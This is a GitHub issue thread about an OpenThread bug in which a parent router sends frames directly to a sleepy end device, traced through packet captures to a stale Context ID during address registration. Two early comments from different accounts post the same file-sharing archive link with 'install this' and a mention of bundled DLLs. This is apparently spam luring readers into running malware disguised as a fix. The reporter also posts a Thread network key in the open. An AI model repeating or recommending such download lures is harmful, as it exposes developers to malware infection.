openthread/openthread #10737: The Thread router sends Mac data frames directly to the rx-off-when-idle SED.

jinpeng1989, 2024-09-19:
**Describe the bug**: To my understanding, when end device operating in an rx-off-when-idle link mode, Thread router should not send Mac data directly to end device. Instead, Thread router should wait until receive the query (MAC Data Request) from the SED and reply with an ACK frame, than it can send the Mac data frame. But we observed that Thread router sends Mac data frames directly to the rx-off-when-idle SED. Is the Thread router behaving correctly?

At 49854 frame, Thread router (0x0c00) sends Mac data directly to the SED device (0x0c1d). Preliminary analysis indicates that the Thread Router is faulty. However, this issue can also be observed when this SED product is connected to other Thread Router products. Can you help analyze it?

[image]
[image]

Networkkey: fdbbf7fc9a27c8839ae75390b803ea51

wpan.addr64 eq be:15:84:e8:d9:cf:dc:90 || wpan.addr16 == 0x0c1d
[Large_00002_20240915091523.zip](https://github.com/user-attachments/files/17056998/Large_00002_20240915091523.zip)

miguellords, 2024-09-19:
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

Andrez092, 2024-09-19:
I think this will help you.
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

jinpeng1989, 2024-09-20:
Here SED attempts to register the OMR address with Context ID 2. However, the Thread Network Data does not contain the Prefix whose Context ID is 2. The Context ID of this OMR prefix is 1.  The OMR address of SED is not successfully registered on the Parent device. Obviously, the network data held by the SED is inconsistent with the network data held by the Parent device.
[image]
Before reattaching, the SED data version is 52+246, and the Parent device data version is 189+153. A more reasonable behavior is that SED should synchronize Network Data before registering OMR addresses. In addition, the Child ID Response frame indicated that the OMR address was not registered successfully, and SED did not try to register the OMR address again after updating the Network Data.
[image]
My preliminary conclusion is that WRA did not register the OMR address correctly, causing the Thread Router to behave abnormally. To check this, I analyzed this scenario in which the WRA was re-powered and then re-attached. After the battery was reinstalled, the WRA (be:15:84:e8:d9:cf:dc:90) resumed normal communication with the Thread Router. This time, WRA registers the OMR address through Child Upgate Request after Network data is synchronized.
[image]

abtink, 2024-09-20:
Thanks @jinpeng1989 . 

Here's my analysis of what's happening:

* The child node is detached for a while.
* While the child is detached, numerous changes occur to the Network Data (indicated by a larger netdata version gap).
* During these changes, the same OMR prefix is removed and then re-added, but somehow ends up with a different Context ID.
    * Generally, the leader tracks previously assigned Context IDs to on-mesh prefixes and prevents their reuse for some time.
    * If the same prefix is added back, the leader assigns the same context ID.
    * For the situation in this issue to occur, the OMR prefix must have been removed for a while and then re-added (after the context ID reuse delay expired) while other prefixes were added/removed (consuming other context ID values).
* Upon attaching, the child receives the latest Network Data (in the "Child ID Response") and processes its entries.
* Since the child still sees the same OMR prefix in the updated Network Data, no changes are triggered to its addresses.
* The context ID change doesn't trigger a "Child Update Request" or address re-registration on the child side.

We could consider adding code to detect context ID changes and re-register addresses, though this might not be a simple change.

I wrote a test case and reproduced this situation by managing network data entries. However, I'm unsure how likely it is to occur in practice.

> A more reasonable behavior is that SED should synchronize Network Data before registering OMR addresses

While this may seem like a solution to this particular situation, it's not a possible approach. The child cannot wait to receive network data before registering its addresses (during attach). This violates the required behavior specified by the Thread specification and would cause all SEDs to communicate multiple times after attaching, which is undesirable.

jinpeng1989, 2024-09-21:
@abtink 
Thank you for your analysis and support.
It is worth mentioning that the time of this SED re-attach is 2024-09-15 **12:15:36**, during the period from 2024-09-15 **12:14:36** to 2024-09-15 **12:17:16**, one Thread router (wpan.addr64 eq d2:6c:3b:63:98:d7:88:ce) creates a new partition, and then other Thread routers link to the new partition one by one. 
[image]
[image]
[image]
[image]

jinpeng1989, 2024-09-21:
The **Old Parent** device of SED is: wpan.addr64 eq 6a:26:32:a7:f9:19:cb:05 || wpan.addr16 == 0xb400
The **New Parent** device of SED is: wpan.addr64 eq 9a:25:fe:de:4a:c1:33:40 || wpan.addr16 == 0x0c00
2024-09-15 12:14:28 Old Parent sends a "Parent Request" to try to reattach to the network. (It looks like it is detached.)
mle.cmd == 9
[image]

2024-09-15 12:14:36 A Thread router (wpan.addr64 eq d2:6c:3b:63:98:d7:88:ce) creates a new Thread partition (0x3ff4ac89).

2024-09-15 12:14:36 SED sends 16 (4 * 4) packets of Data Request to Old Parent.

2024-09-15 12:14:37 New Parent attached to the new Thread partition.
wpan.addr64 eq 9a:25:fe:de:4a:c1:33:40 && mle
[image]

2024-09-15 12:15:36 SED sends 16 (4 * 4) None of the 16 packets receives a Mac Ack. The SED is detached.
(wpan.addr64 eq be:15:84:e8:d9:cf:dc:90 && mle) || wpan.addr16 == 0xb435
[image]

2024-09-15 12:15:37 SED attached to the New Parent (new partition).
wpan.addr64 eq be:15:84:e8:d9:cf:dc:90 && mle
[image]

jinpeng1989, 2024-09-21:
A brief summary of the important events:
2024-09-15 12:14:28 **Old Parent** sends a "Parent Request" to try to reattach to the network. (It looks like it is **detached**.)
2024-09-15 12:14:36 Creates a **new Thread partition** (0x3ff4ac89).
2024-09-15 12:14:37 **New Parent** attached to the new Thread partition.
2024-09-15 12:15:36 The SED is detached from **Old Parent**.
2024-09-15 12:15:37 The SED attached to the **New Parent**.

jinpeng1989, 2024-09-21:
For the sake of analysis, I put all five consecutive days of the system's capture packets here.
Networkkey: fdbbf7fc9a27c8839ae75390b803ea51

[Large_00001_20240914091524.zip](https://github.com/user-attachments/files/17082671/Large_00001_20240914091524.zip)
[Large_00002_20240915091523.zip](https://github.com/user-attachments/files/17082674/Large_00002_20240915091523.zip)
[Large_00003_20240916091523.zip](https://github.com/user-attachments/files/17082675/Large_00003_20240916091523.zip)
[Large_00004_20240917091523.zip](https://github.com/user-attachments/files/17082676/Large_00004_20240917091523.zip)
[Large_00005_20240918091524.zip](https://github.com/user-attachments/files/17082677/Large_00005_20240918091524.zip)

jinpeng1989, 2024-09-21:
2024-09-15 12:15:37 The SED attached to the New Parent. The transmission with  the Parent Device began abnormally.
2024-09-18 15:01:01 Repower the SED,  after reattaching, it resumed normal transmission with the Parent Device.

That is to say:
* 1 When the situation in this issue occurs, communication was not restored for three days.
* 2 Restarting SED will restore communication.

**During these three days, there is no MLE message communication between SED and the parent device.**
[image]

jinpeng1989, 2024-09-21:
During this 3-day period:
* 1 The SED sends Data Request to the parent device every three minutes. The Parent Device responds with Mac Ack.
* 2 The Parent Device always responds Mac ACK to Mac Data sent by SED.

* 1 (wpan.src16 == 0x0c1d && wpan.dst16 == 0x0c00) && wpan.frame_type == 3
[image]

* 2 (wpan.src16 == 0x0c1d && wpan.dst16 == 0x0c00) && wpan.frame_type == 1
[image]

jinpeng1989, 2024-09-21:
@abtink 
The biggest issue is that the Parent treat this SED as an rx-on-when idle device, even though it claims to be rx-off-when idle when attached. It always sends Mac Data directly to SED without waiting for a "Data Request" from SED. Can you help to analyze the root cause?
ipv6.addr eq ::bfe8:c3a5:63d2:3146 and ipv6.addr eq ::c559:6396:5066:65c4
[image]

jinpeng1989, 2024-09-21:
This SED is not unique in this situation, there are other SEDs in this system that have the same problem. For the sake of discussion, the SED we analyzed before is named SED-1, and the second is named SED-2. The corresponding Parent devices are parent-1 and parent-2. Parent-1 is a Thread Border Router, Parent-1 is a REED, they are different products.

* SED-1: (wpan.addr64 eq be:15:84:e8:d9:cf:dc:90 && mle) || wpan.addr16 == 0x0c1d
[image]

* SED-2: (wpan.addr64 eq 8a:ba:2d:82:87:a4:76:0f && mle) || wpan.addr16 == 0xb009
[image]

jinpeng1989, 2024-09-21:
@abtink 
I analyzed another SED that can communicate normally, which is the same product as SED-1/SED-2. Let's call it SED-3. When it reattaches, it has a significant difference from SED-1/SED-2. After the Child ID Response, a Child Update Request/Response is exchanged for a short period of time. The parent device did not mistake SED-3 for an rx-on-when-idle device. So our guess is that the **Parent Device does not record the "Receive On When Idle" tag** in the "Child ID Request" and defaults to True. Once there is a "Child Update Request", the error will be corrected and the communication will be normal. If there is no "Child Update Request" to correct this error, the communication will remain abnormal. Can you confirm at the code level if this is the root cause?

SED-3: wpan.addr64 == 36:0f:47:7a:b3:93:51:38
(wpan.addr64 == 36:0f:47:7a:b3:93:51:38 && mle) || wpan.src16 == 0x0c1b
[image]

abtink, 2024-09-22:
> So our guess is that the Parent Device does not record the "Receive On When Idle" tag in the "Child ID Request" and defaults to True.

This cannot be the case. 

1) You can check the [`MleRouter::HandleChildIdResponse()`](https://github.com/openthread/openthread/blob/bd310dba958818d36ed5dcfe9e9e977fb9f80882/src/core/thread/mle_router.cpp#L1972-L2132). The Mode TLV is parsed and saved on the child (`child->SetDeviceMode(mode)`).

2) During the attach process of an SED child, the "Child ID Response" message (from parent to child) is sent as an indirect message (i.e., the parent waits for a data poll from the child). If the parent didn't record the correct "mode" for the child, the attachment itself would not succeed.

> The biggest issue is that the Parent treat this SED as an rx-on-when idle device, even though it claims to be rx-off-when idle when attached. It always sends Mac Data directly to SED without waiting for a "Data Request" from SED. Can you help to analyze the root cause?

The issue doesn't seem to be that the parent is unaware of the child's Mode TLV and/or doesn't track or remember that it's sleepy. The issue appears to be related to address registration failure. The child uses a wrong/stale context ID, causing the registered address to be rejected and not tracked by the parent (evident from the "Child ID Response" containing an empty "Address Registration TLV"). Note that all subsequent messages sent to this child address are sent as direct transmissions.

Regarding this issue and my earlier analysis, I've submitted the following PR:
- https://github.com/openthread/openthread/pull/10743

jinpeng1989, 2024-09-23:
So, the conclusion for now is that we should integrate this [fix](https://github.com/openthread/openthread/pull/10743/commits/4f44e46949b761cbcee8dcf633d5741ca39aca03) on the SED side to solve the issue in this scenario, right?

jinpeng1989, 2024-09-23:
The OpenThread that the SED now uses is
[c6a258e](https://github.com/openthread/openthread/tree/c6a258e3a5bd90aa26d8245c435c0ae5797027f4)
(2020-04-04). Is it possible to integrate this fix in this release of OpenThread?

closed 2024-10-05 by jinpeng1989